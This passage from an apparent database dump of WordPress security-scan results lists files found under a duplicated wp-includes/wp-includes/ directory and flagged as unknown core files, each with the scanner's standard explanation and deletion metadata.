More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/wp-embed.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27458,1631424935,1631424935,'new','knownfile',75,'756d1c42e40922b466ab812589cfb8e9','147f1b661c1687f718d6692bfd928004','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-emoji-loader.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/wp-emoji-loader.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27459,1631424935,1631424935,'new','knownfile',75,'2a8b31f0a8473ee45f49dcf6be6471ab','95b52cff79495743f2dcc20e435348a4','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-emoji-loader.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/wp-emoji-loader.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27460,1631424935,1631424935,'new','knownfile',75,'d80757ab2d12753f267718bb0f11808d','cab1009c3f9152e2b635d4d0b4990cfb','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-emoji-release.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/wp-emoji-release.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27461,1631424935,1631424935,'new','knownfile',75,'9c64678dbb8d2f86f63450232b5c7d82','65047d83bb81007c1f6589a11920d3db','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-emoji.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/wp-emoji.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27462,1631424935,1631424935,'new','knownfile',75,'2c4267208692d7470d12f88b25399633','4ffc189aa86c697785cc5908f0f40394','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-emoji.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/wp-emoji.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27463,1631424935,1631424935,'new','knownfile',75,'20c7278219bd4122e1234c960bda40cd','95403d9ab801a246a26707dadf76bc9f','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-list-revisions.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/wp-list-revisions.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27464,1631424935,1631424935,'new','knownfile',75,'6435f8996875bdc2174996fde0eed364','f25cab857dff956a0a1e14b93441efcc','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-list-revisions.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/wp-list-revisions.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27465,1631424935,1631424935,'new','knownfile',75,'2a1badde098974df2770ee829054eebd','8f77c38ce173bd92e73c4c9c15810229','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-lists.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/wp-lists.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27466,1631424936,1631424936,'new','knownfile',75,'62becb0a6403117eb2d378fd68ea8279','db34de383b965e08d4806cf0bac083d8','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-lists.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/wp-lists.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27467,1631424936,1631424936,'new','knownfile',75,'5028abfd9a33efe3395848ab12341a25','cc59db16f747e3c940c14dae873bac69','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-pointer.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/js/wp-pointer.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27468,1631424936,1631424936,'new','knownfile',75,'6718061c5a6d6ad535920740d5e5e273','2217218ecbe45d634d1bce345259ff3e','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-pointer.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/wp-pointer.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27469,1631424936,1631424936,'new','knownfile',75,'157fb2fb2e7a498ea5cad8ef5bbbe95a','df00c4c9dcb78a1c6878ecb51b5b2549','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-sanitize.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/wp-sanitize.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27470,1631424936,1631424936,'new','knownfile',75,'daf667e650737df19d69cee9151bc665','84d7b8d3fbf9f675e9d8fb19f37e601f','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-sanitize.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/wp-sanitize.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27471,1631424936,1631424936,'new','knownfile',75,'796d05a832abcdbe6f91b477df898286','3394fdacd7acacfa526d90f158bff504','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-util.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/js/wp-util.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27472,1631424937,1631424937,'new','knownfile',75,'fe07187ac8256d343a83e537935474ff','6a234ae29bb176c1059e863076fbfed9','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-util.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/wp-util.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27473,1631424937,1631424937,'new','knownfile',75,'222120ecdafd0d55df272d1107096851','5c851f90fcb798403019e480c4ab40d8','Unknown file in WordPress core: wp-includes/wp-includes/js/wpdialog.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/wpdialog.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27474,1631424937,1631424937,'new','knownfile',75,'06487584f27c3d1ba2e1aa7b41d64f48','e3d74a5d14685c5611b54724e1f1abd9','Unknown file in WordPress core: wp-includes/wp-includes/js/wpdialog.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/wpdialog.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27475,1631424937,1631424937,'new','knownfile',75,'b435534457916751952eb889ec233437','361aaa3cef246f42153598ff308ae9c9','Unknown file in WordPress core: wp-includes/wp-includes/js/wplink.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/js/wplink.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27476,1631424937,1631424937,'new','knownfile',75,'f4021c299b8b2fcce58d756a57126265','4ac38834aed56f539acf3594c9f6b1c9','Unknown file in WordPress core: wp-includes/wp-includes/js/wplink.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/js/wplink.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27477,1631424937,1631424937,'new','knownfile',75,'b79d13b910ba0085ee14c737103c557e','2c9b549943eba61edf6a340f661f65bc','Unknown file in WordPress core: wp-includes/wp-includes/js/zxcvbn-async.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/zxcvbn-async.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27478,1631424937,1631424937,'new','knownfile',75,'224e0835a1ee69b23f3fef63a2b4ad18','e4192fce595a7366b076542fe4579fca','Unknown file in WordPress core: wp-includes/wp-includes/js/zxcvbn-async.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/zxcvbn-async.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27479,1631424937,1631424937,'new','knownfile',75,'e439f19e2fb0d45671f15c6d0ba633fd','18e4923b0f764fcf37ca7434d78d7430','Unknown file in WordPress core: wp-includes/wp-includes/js/zxcvbn.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/js/zxcvbn.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27480,1631424937,1631424937,'new','knownfile',75,'ac3b180de7024db8ed0490bbcf11fe69','67a4d04f4f402cf4020f4d954878804a','Unknown file in WordPress core: wp-includes/wp-includes/kses.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/kses.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27481,1631424937,1631424937,'new','knownfile',75,'50cd9e08d7213e0f3fa3d8e606f1ae53','4c500e0902ea9c6d541f513b3993f00a','Unknown file in WordPress core: wp-includes/wp-includes/l10n.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/l10n.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27482,1631424937,1631424937,'new','knownfile',75,'837423fd088bd3caae53b75d3e0a7217','1d823d53de5dab8132750329724371fb','Unknown file in WordPress core: wp-includes/wp-includes/link-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/link-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27483,1631424937,1631424937,'new','knownfile',75,'be0a3f8bae74519da81f7c5d169c0559','1d4c0c0cd5dfb45ab35d3e2357b7ddb9','Unknown file in WordPress core: wp-includes/wp-includes/load.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/load.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27484,1631424937,1631424937,'new','knownfile',75,'b68b59a8f6706ec76c13777b7c2622b9','e18aa45e2061eab8135b7a9667f95e9a','Unknown file in WordPress core: wp-includes/wp-includes/locale.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:34:\"wp-includes/wp-includes/locale.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27485,1631424937,1631424937,'new','knownfile',75,'82a9d43e90c43accde99c6f5cbfa5ae9','583603239864283a222abcc0f73c4d92','Unknown file in WordPress core: wp-includes/wp-includes/media-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/media-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27486,1631424937,1631424937,'new','knownfile',75,'2307f3de777ac210833ff74417e151bb','6b0ad5d688cae8d568bafab103d620c9','Unknown file in WordPress core: wp-includes/wp-includes/media.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:33:\"wp-includes/wp-includes/media.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27487,1631424937,1631424937,'new','knownfile',75,'5b9c29555553fc81fd7e4f8920191374','9ff20bb733dcb22d62e428451f5d4e8e','Unknown file in WordPress core: wp-includes/wp-includes/meta.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/meta.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27488,1631424937,1631424937,'new','knownfile',75,'b33f7723f1470e7ade815eb1e426eab3','d62ab94d4c45b2bd8af11a8e63ef80e1','Unknown file in WordPress core: wp-includes/wp-includes/ms-blogs.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/ms-blogs.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27489,1631424938,1631424938,'new','knownfile',75,'7157e49c363f40368ba3698f7baf1a42','bcdb048e5bbdc8933fb535dc6529e464','Unknown file in WordPress core: wp-includes/wp-includes/ms-default-constants.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/ms-default-constants.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27490,1631424938,1631424938,'new','knownfile',75,'e54c9998add589ef176475364f176a74','43a8b34cdf34b18b5e3627806673423c','Unknown file in WordPress core: wp-includes/wp-includes/ms-default-filters.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/ms-default-filters.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27491,1631424938,1631424938,'new','knownfile',75,'2d090aee41578c1eb922c27899585bfa','fcabe604025707d10536f5c04dbeade6','Unknown file in WordPress core: wp-includes/wp-includes/ms-deprecated.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/ms-deprecated.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27492,1631424938,1631424938,'new','knownfile',75,'00a7a940aeca716f86336c0efd5ed603','f7be32c9cfe37b8eb0b3335d8eafa8f1','Unknown file in WordPress core: wp-includes/wp-includes/ms-files.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/ms-files.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27493,1631424938,1631424938,'new','knownfile',75,'d3475c4e06537b94f3bff698c5c93fca','b0e937534322d87d147dc91b38b9a7b1','Unknown file in WordPress core: wp-includes/wp-includes/ms-functions.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/ms-functions.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27494,1631424938,1631424938,'new','knownfile',75,'72e3eb9a451932a6d5b78925787604ef','1a6f8e623851929970f4bb7e71fc1ec8','Unknown file in WordPress core: wp-includes/wp-includes/ms-load.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/ms-load.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27495,1631424938,1631424938,'new','knownfile',75,'cac2efbc366636385d3dabaceb9bef0a','9d97860b7cd52fda11056b17bc7ca767','Unknown file in WordPress core: wp-includes/wp-includes/ms-network.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/ms-network.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27496,1631424938,1631424938,'new','knownfile',75,'34332f43b6dd4d4a23093ced2250f400','229d71c785b7f8b0c992ccb3e369bf33','Unknown file in WordPress core: wp-includes/wp-includes/ms-settings.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/ms-settings.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27497,1631424938,1631424938,'new','knownfile',75,'1a6b43315ed86cf850a6baf05f529f3e','e252ec1ba2cd718608b40ba9a345bd83','Unknown file in WordPress core: wp-includes/wp-includes/ms-site.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/ms-site.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27498,1631424938,1631424938,'new','knownfile',75,'2f361002112533eac2c0c029764d4498','d0a8d379ada2f5a5a14f49fea82af1cc','Unknown file in WordPress core: wp-includes/wp-includes/nav-menu-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 